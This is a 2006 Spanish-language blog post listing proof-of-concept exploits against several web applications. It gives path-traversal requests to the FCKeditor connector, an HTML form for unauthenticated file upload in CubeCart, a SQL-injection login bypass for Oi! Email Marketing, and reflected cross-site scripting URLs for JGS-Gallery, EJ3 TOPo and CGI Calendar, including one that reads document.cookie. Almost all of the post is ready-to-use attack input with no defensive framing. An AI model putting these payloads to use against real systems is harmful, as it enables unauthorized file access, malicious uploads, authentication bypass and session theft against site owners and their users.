ecoestadistica.com

martes, febrero 28, 2006

Vulnerabilidades...

FCKeditor 2.0 FC

Prueba de Concepto:

http://SERVER/filemanager/browser/default/connectors/php/connector.
php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.
php?Command=CreateFolder&Type=File&CurrentFolder=../..
/&NewFolderName=TESTNAME

---------------------------------------------------------------------------------------------------

CubeCart 3.0.0 – 3.0.6

Exploit:
form
action="http:
//host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/p
hp/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="POST" enctype="multipart/form-data">
File Upload

input id="txtFileUpload" type="file" name="NewFile">
br>
input type="submit" value="Upload">
/form>

-------------------------------------------------------------------------------------------------

Oi! Email Marketing 3.0 SQL Injection

Prueba de Concepto:

http://www.site.com/oi/index.php

Username : username' OR '

Password : ' OR '

-------------------------------------------------------------------------------------------------

Woltlab Burning Board 2.x (JGS-Gallery MOD <= 4.0) multiple XSS

Prueba de Concepto:

GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=XSS
EJEMPLO -> http://site/jgs_galerie_slideshow.php?sid=&katid=&userid=scriptalert('X');/scri
pt
GET -> http://site/jgs_galerie_scroll.php?userid=XSS
EJEMPLO ->
http://site/jgs_galerie_scroll.php?userid=scriptalert('X');/script
GET -> http://site/jgs_galerie_slideshow.php?sid=&katid=XSS&userid=
EJEMPLO ->
http://site/jgs_galerie_slideshow.php?sid=&katid=scriptalert('X');/script&userid=

-------------------------------------------------------------------------------------------------

EJ3 TOPo Cross Site Scripting Vulnerability

Prueba de Concepto :
access /code/inc_header.php like
inc_header.php?gTopNombre=“>scriptalert(document.
cookie)/script

-------------------------------------------------------------------------------------------------

CGI Calendar XSS Vulnerability

Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-
us&mode=all&month=2&date=1&year=scriptalert('xss&
#39;);/script&db=1

/cgi-bin/calendar2/viewday.cgi?lang=en-
us&mode=all&month=2&date=1&year=scriptalert('xss&
#39;);/script&db=1

-------------------------------------------------------------------------------------------------

publicado por Mousehack a las 9:12 p. m. 

ecoestadistica.com